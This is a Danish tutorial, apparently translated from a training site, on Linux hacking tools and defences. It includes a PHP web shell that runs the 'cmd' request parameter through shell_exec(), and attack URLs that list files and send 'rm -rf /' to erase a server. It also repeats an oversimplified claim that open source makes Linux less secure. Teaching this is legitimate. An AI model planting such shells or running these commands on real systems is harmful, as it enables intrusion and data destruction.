Hacking Linux OS: Hacking med Ubuntu (Kommandovejledning)
Linux er det mest udbredte serveroperativsystem, især til webservere. Det er open source; det betyder, at alle kan få adgang til kildekoden. Dette gør det mindre sikkert sammenlignet med andre operativsystemer, da angribere kan studere kildekoden for at finde sårbarheder. Linux for Hackers handler om at udnytte disse sårbarheder til at få uautoriseret adgang til et system.
I denne artikel vil vi introducere dig til, hvad Linux er, dets sikkerhedssårbarheder, hacking med Ubuntu og de modforanstaltninger, du kan sætte ind.
Hurtig note om Linux
Linux er et open source-operativsystem. Der er mange distributioner af Linux-baserede operativsystemer såsom Redhat, Fedora og Ubuntu, osv. I modsætning til andre operativsystemer er Linux mindre sikkert, når det kommer til sikkerhed. Det skyldes, at kildekoden er frit tilgængelig, så det er nemt at studere den for sårbarheder og udnytte dem sammenlignet med andre operativsystemer, der ikke er open source. Linux kan bruges som server-, desktop-, tablet- eller mobilenhedsoperativsystem.
Linux-programmer kan betjenes ved hjælp af enten GUI eller kommandoer. Linux-kommandoer til Kali Linux hacking er mere effektive og effektive sammenlignet med at bruge GUI. Af denne grund hjælper det at kende grundlæggende Linux-kommandoer til hacking.
Se disse tutorials https://www.guru99.com/unix-linux-tutorial.html om hvordan man kommer i gang med Kali Linux hacks.
Linux hacking værktøjer
- Nessus– dette værktøj kan bruges til Ubuntu hack, scanningskonfigurationsindstillinger, patches og netværk osv. kan findes på https://www.tenable.com/products/nessus
- NMap. Dette værktøj kan bruges til at overvåge værter, der kører på serveren, og de tjenester, de bruger. Den kan også bruges til at scanne efter porte. Den kan findes på https://nmap.org/
- SARA – SARA er forkortelsen for Security Auditor's Research Assistant. Som navnet antyder, kan dette værktøj bruges til at auditere netværk mod trusler som f.eks SQL Injection, XSS etc. kan findes på http://www-arc.com/sara/sara.html
Ovenstående liste er ikke udtømmende; det giver dig en idé om de værktøjer, der er tilgængelige for Ubuntu hacking og hacking af Linux-systemer.
Sådan forhindrer du Linux-hack
Linux Hacking udnytter sårbarhederne i operativsystemet. En organisation kan vedtage følgende politik for at beskytte sig selv mod sådanne angreb.
- Patch management– patches løser fejl, som angribere udnytter til at kompromittere et system. En god patch management politik vil sikre, at du konstant anvender relevante patches til dit system.
- Korrekt OS-konfiguration– andre udnyttelser udnytter svaghederne i serverens konfiguration. Inaktive brugernavne og dæmoner bør deaktiveres. Standardindstillinger såsom almindelige adgangskoder til applikationen, standardbrugernavne og nogle portnumre bør ændres.
- System til påvisning af indtrængen– sådanne værktøjer kan bruges til at opdage uautoriseret adgang til systemet. Nogle værktøjer har evnen til at opdage og forhindre sådanne angreb.
Hackingaktivitet: Hack a Ubuntu Linux-system ved hjælp af PHP
I dette praktiske scenarie lærer vi, hvordan man hacker med Ubuntu og vi vil give dig grundlæggende oplysninger om, hvordan du kan bruge PHP at kompromittere en Linux. Vi vil ikke sigte mod et offer. Hvis du vil prøve det, kan du installere LAMPP på din lokale maskine.
PHP kommer med to funktioner, der kan bruges til at udføre Linux-hacking-kommandoer. Den har funktionerne exec() og shell_exec(). Funktionen exec() returnerer den sidste linje af kommandoens output, mens shell_exec() returnerer hele resultatet af kommandoen som en streng.
Til demonstrationsformål, lad os antage, at angriberadministratorerne uploader følgende fil på en webserver.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
HER,
Ovenstående script henter kommandoen fra GET-variablen ved navn cmd. Kommandoen udføres ved hjælp af shell_exec() og resultaterne returneres i browseren.
Ovenstående kode kan udnyttes ved hjælp af følgende URL
http://localhost/cp/konsole.php?cmd=ls%20-l
HER,
- "...konsole.php?cmd=ls%20-l"tildeler værdien ls –l til variablen cmd.
Kommandoen i Ubuntu for hacking mod serveren vil blive udført som
shell_exec('ls -l') ;
Udførelse af ovenstående kode på en webserver giver resultater svarende til følgende.
Ovenstående kommando viser blot filerne i den aktuelle mappe og tilladelserne
Lad os antage, at angriberen sender følgende kommando
rm -rf /
HER,
- "rm" fjerner filerne
- "rf" får rm-kommandoen til at køre i en rekursiv tilstand. Sletning af alle mapper og filer
- "/" instruerer kommandoen til at begynde at slette filer fra rodmappen
Angrebs-URL'en ville se nogenlunde sådan ud
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Resumé
- Linux er et populært styresystem til servere, desktops, tablets og mobile enheder.
- Linux er open source, og kildekoden kan fås af alle. Dette gør det nemt at spotte sårbarhederne. Det er et af de bedste OS for hackere.
- Grundlæggende og netværkshacking-kommandoer ind Ubuntu er værdifulde for Linux-hackere.
- Sårbarheder er en svaghed, der kan udnyttes til at kompromittere et system.
- En god sikkerhed kan hjælpe med at beskytte et system mod at blive kompromitteret af en hacker.